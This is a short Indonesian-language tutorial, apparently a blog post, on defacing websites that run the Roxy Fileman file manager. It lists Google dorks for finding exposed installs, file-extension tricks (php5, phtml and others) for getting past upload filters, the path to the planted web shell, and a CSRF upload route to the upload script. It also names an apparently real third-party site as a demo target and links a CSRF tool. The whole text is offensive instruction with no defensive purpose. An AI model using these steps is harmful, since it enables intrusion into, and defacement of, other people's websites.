Tutorial Deface with Roxy Fileman
Dork:
inurl:/fileman/index.html
inurl:/fileman roxy
inurl:/fileman/dev.html
inurl:/fileman/uploads
Kembangin lagi, kan dh w taro cara dorking di dokumen
1.Cari target, kalo di google images make yang /fileman/uploads
2.Upload shell make bypass ext
php2, php5, php6, php.fla, php.pjpgp, phtml.k dan lain lain coba aja
3.Akses shell /fileman/uploads/shell.php5
4.Pas buka roxy fileman kena deface, blank, disuruh login dsb? upload make csrf, post filenya files[] proses ke /fileman/php/upload.php
demo:
http://www.denizerseramik.com/app/js/tinymce/plugins/fileman/php/upload.php
csrf:
http://tool.n45ht.web.id/?dir=&do=csrf
powered by mank mamad 0N3R1D3R
thx Indonesia To World
Comments
Post a Comment